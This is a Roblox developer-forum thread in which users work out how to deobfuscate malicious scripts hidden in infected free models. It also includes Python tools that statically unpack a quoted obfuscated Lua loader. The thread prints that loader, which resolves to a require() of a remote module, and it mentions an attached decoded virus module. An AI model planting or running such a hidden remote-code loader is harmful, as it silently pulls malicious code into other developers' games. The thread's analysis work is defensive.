How do I dissect obfuscated scripts?

I’m finding a few infected models being botted to the front of the Library. These models have obfuscated scripts in them. Heck, this script in one model (with loooong tab spam removed):

getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{48,88,67,67,52,48,67,69,65,49})))

turned into this:

require(3426799265)

The ModuleScript there has a ton of obfuscated code. It even does local variable spam:

local a=select;local b=string.byte;local c=string.sub;local d=string.char;

I can deobfuscate stuff, but I don’t have the time to dig through this much obfuscated code.

Anybody know of helper tools or resources I can use to solve things like this faster?

Interesting, but mean phrase I found

“HELP ME PEOPLE ARE CRASHING MY GAME PLZ HELP”

5 Likes

You can just copy the code into Microsoft Word and then use the find-and-replace feature to change the variable names throughout the code.

Outside of stuff to make it easier (such as a beautifier), not really. You’ll have to dissect it by hand, but it’s quite an enjoyable experience personally. You learn something from it, there’s no loss on your part.

If you require a beautifier (it can also rename variables to make reverse engineering a bit easier), you can use this: https://www.roblox.com/library/197760456/Stravant-Minify-Beautify

Great plugin by stravant, super useful for when I need to take apart some obfuscated code.

1 Like
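The find-and-replace and rename-in-beautifier advice above is the part of the job that can be scripted. The following Python is an added example, not code from the original thread or from the Stravant plugin: it reads `local alias=target;` declarations of the kind quoted in the question (`local a=select;local b=string.byte;...`), follows alias chains, drops the declarations and substitutes the real names back at every use site, while leaving string literals and comments untouched. The sample Lua input is constructed for the example and the function names are this example's own. It is regex-based and knows nothing about Lua scoping, so a shadowed name in an inner block would be rewritten too; treat the output as a starting point for manual work, not a faithful transformation.

```python
import re

# Constructed sample in the style of the "local variable spam" quoted in the question.
SAMPLE = """local a=select;local b=string.byte;local c=string.sub;local d=string.char;local h=b;
local function e(f,g) return d(h(c(f,g,g))) end
print(e("hello",2),a("#",1,2,3),"a b c d")
"""

# local NAME = IDENT(.FIELD)* followed by ';' or end of line
ALIAS_DECL = re.compile(
    r'local\s+([A-Za-z_]\w*)\s*=\s*([A-Za-z_]\w*(?:\.[A-Za-z_]\w*)*)\s*(?:;|$)', re.M)
# Double-quoted strings, single-quoted strings and line comments: never rewrite inside these.
STRING_OR_COMMENT = re.compile(r'"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\'|--[^\n]*')


def split_code_and_literals(src):
    """Yield (is_code, text) segments so substitutions skip strings and comments."""
    pos = 0
    for m in STRING_OR_COMMENT.finditer(src):
        if m.start() > pos:
            yield True, src[pos:m.start()]
        yield False, m.group(0)
        pos = m.end()
    if pos < len(src):
        yield True, src[pos:]


def collect_aliases(src):
    """Map alias name -> fully resolved target (chains such as h=b, b=string.byte are followed)."""
    aliases = {}
    for is_code, text in split_code_and_literals(src):
        if is_code:
            for m in ALIAS_DECL.finditer(text):
                name, target = m.group(1), m.group(2)
                if name != target:
                    aliases[name] = target
    for name in list(aliases):
        target, seen = aliases[name], {name}
        while True:
            head, dot, rest = target.partition('.')
            if head in aliases and head not in seen:
                seen.add(head)
                target = aliases[head] + dot + rest
            else:
                break
        aliases[name] = target
    return aliases


def inline_aliases(src):
    """Drop the alias declarations and put the real names back at every use site."""
    aliases = collect_aliases(src)
    if not aliases:
        return src
    # Not preceded by a word char, '.' or ':' (so fields and methods are untouched)
    # and not the left-hand side of an assignment.
    use = re.compile(r'(?<![\w.:])(' + '|'.join(map(re.escape, aliases)) + r')\b(?!\s*=[^=])')
    out = []
    for is_code, text in split_code_and_literals(src):
        if is_code:
            text = ALIAS_DECL.sub(lambda m: '' if m.group(1) in aliases else m.group(0), text)
            text = use.sub(lambda m: aliases[m.group(1)], text)
        out.append(text)
    return ''.join(out)


if __name__ == "__main__":
    print(inline_aliases(SAMPLE))
```

Run on the sample, `d(h(c(f,g,g)))` comes back as `string.char(string.byte(string.sub(f,g,g)))` and the literal `"a b c d"` is left alone. The string-literal split is what Word's find-and-replace cannot do for you: a one-letter alias like `a` appears inside almost every string in a real script.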

I like the formatting. This should help.

The script is way too large for the plugin to see the whole thing (the Roblox API truncates script.Source to something like 20,000 characters), and so it errors. I'm going to try feeding in the text directly using a script that uses string block syntax.

Hi there.

Just worth bringing up that this has been obfuscated using Synapse Xen; the tools around to handle this are limited, and it is not designed to be easy to fix. Also, any efforts shared anywhere on the DevForums could be seen, especially in the public and new-member areas, so please expect that when communicating here as you are.

Effectively, this is not a fast process and will take a long period of time. It also depends on what settings have been used with Xen, as that can change how you deobfuscate. These are, according to the creator:

  • Reduced Mode: You can disable certain protection features to improve script performance. This is useful for larger scripts that wish to keep high performance while still being obfuscated.

  • Constant Protection: This protection allows you to protect certain constants in your script from being dumped. This is really useful for ‘high value’ strings that you do not want to be grabbed from your script.

  • Anti-Axon/Anti-Sandbox Built In: Synapse Xen gives you the option to automatically disallow people using Axon based exploits from executing your scripts, while requiring no changes on your end. It also protects against most types of Lua sandboxes commonly used by Roblox game developers.

  • VM Bytecode Obfuscation: This protects the Synapse Xen VM at the bytecode level, making it even more difficult for someone to reverse engineer your scripts. This feature currently only works on Synapse X. (and hopefully ProtoSmasher in the next update)

According to the creator,

Synapse Xen uses all available techniques I know of to protect your script. Of course, deobfuscating your script (or by that matter, any obfuscated application) is possible, but doing it is very difficult, time consuming, and is most definitely not a trivial task.

This is not just a few simple tricks, this person has spent a lot of time at the very details of Lua and Roblox to create tools like this.


Based on this, including that the price to use this is free (with Synapse X), it's worth reminding you that even when you do, it may be possible that they'll find a workaround and just make it harder to deobfuscate in the future.

Some top quotes

local s = "wait for someone on devforum to say they are gonna deobfuscate this"

local s = "hi devforum"

4 Likes

Taking the script you provided:

getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{48,88,67,67,52,48,67,69,65,49})))

All you have to do to deobfuscate this is add a print() statement; here is what we get:

print("\101\114\105\117\113\101\114\116\111\110\117\109\98\101\114\99\104\97\114\117\110\112\97\99\107")
eriuqer --The reason why they have string.reverse() is because if you print this area with string.reverse() it reverses the string, pretty sure you already knew this. 
require --this is what it is when reversed
tonumber --A to number statement
char --Character?
unpack --Unpack argument

Now we are left with this, which is a table:

{48,88,67,67,52,48,67,69,65,49}

Now let's move on to the module. This is super difficult, as railworks mentioned.

I was able to decode this module, but it took me around 20 minutes. My only issue is that it has a ton of profanity in it, so I will not be posting it.
(Once I remove all the profanity, however, I will post the module. Using hex you can decode most of this; the rest is manual.)
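The walkthrough above (and the question's own first-stage script) folds the loader by hand with print(). As an added example that is not from any of the posts, the following Python does the same folding statically, without ever running the script: it decodes the `\ddd` escapes, reverses the literal, resolves `getfenv()["name"]` to `name`, turns `string.char(unpack{...})` back into its string, and evaluates the `tonumber` call on the result. The input is the loader quoted in the question; the pass list, function names and the `lua_tonumber` subset are this example's own assumptions, not a general Lua evaluator.

```python
import re

# The first-stage loader quoted in the question (tab spam removed), used here as sample input.
STAGE1 = r'getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{48,88,67,67,52,48,67,69,65,49})))'


def decode_lua_escapes(s: str) -> str:
    r"""Resolve Lua decimal escapes (\ddd: at most three digits, value <= 255); others are kept."""
    return re.sub(r'\\(\d{1,3})',
                  lambda m: chr(int(m.group(1))) if int(m.group(1)) <= 255 else m.group(0), s)


def lua_tonumber(s: str):
    """Subset of Lua 5.1 tonumber(): decimal integers and 0x/0X hex literals; None otherwise."""
    s = s.strip()
    try:
        if s[:2].lower() == "0x":
            return int(s[2:], 16)
        return int(s)
    except ValueError:
        return None


def fold_literal(m):
    decoded = decode_lua_escapes(m.group(1))
    # Only fold when the result is a plain printable literal; otherwise keep the escapes.
    if decoded.isprintable() and '"' not in decoded and '\\' not in decoded:
        return '"' + decoded + '"'
    return m.group(0)


# Each pass rewrites one obfuscation idiom; the passes repeat until nothing changes.
PASSES = [
    # "\101\114..." -> "er..."
    (re.compile(r'"((?:\\\d{1,3})+)"'), fold_literal),
    # string.reverse("eriuqer") -> "require"
    (re.compile(r'string\.reverse\("([^"\\]*)"\)'), lambda m: '"' + m.group(1)[::-1] + '"'),
    # getfenv()["name"] -> name   (a global looked up through the environment table)
    (re.compile(r'getfenv\(\)\["([A-Za-z_]\w*)"\]'), lambda m: m.group(1)),
    # string["char"] -> string.char
    (re.compile(r'string\["([A-Za-z_]\w*)"\]'), lambda m: 'string.' + m.group(1)),
    # string.char(unpack{48,88,...}) -> "0X..."   (the byte table is just ASCII codes)
    (re.compile(r'string\.char\(unpack\s*\{([\d,\s]*)\}\)'),
     lambda m: '"' + ''.join(chr(int(n)) for n in m.group(1).split(',') if n.strip()) + '"'),
    # tonumber("0XCC40CEA1") -> 3426799265
    (re.compile(r'tonumber\("([^"\\]*)"\)'),
     lambda m: str(lua_tonumber(m.group(1))) if lua_tonumber(m.group(1)) is not None else m.group(0)),
]


def deobfuscate_stage1(src: str, max_rounds: int = 20) -> str:
    """Statically fold the loader's string tricks; nothing in the input is executed."""
    for _ in range(max_rounds):
        before = src
        for pattern, repl in PASSES:
            src = pattern.sub(repl, src)
        if src == before:
            break
    return src


if __name__ == "__main__":
    print(deobfuscate_stage1(STAGE1))  # require(3426799265)
```

The byte table {48,88,67,67,52,48,67,69,65,49} is just the ASCII codes for the text "0XCC40CEA1", and 0xCC40CEA1 is 3426799265, the asset ID in the question. Doing the folding this way, rather than with print(), matters for the unknown samples: a print() in the wrong spot still executes the call that follows it, and the next sample may not be as polite as a plain require.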

I’ve gotten rid of all the profanity, here is a download to the module.
DoNotRunThisModuleItisAVirusDecoded.lua (78.7 KB)

I am unsure if this uses Synapse Xen or Luraph. It mentions buying Luraph instead of Synapse several times, so I am guessing this is Luraph encoded. From what I've heard, Luraph is much easier to decode than Synapse Xen. I used a hex decoder, and the rest I decoded on my own. This took approximately 20 minutes.

7 Likes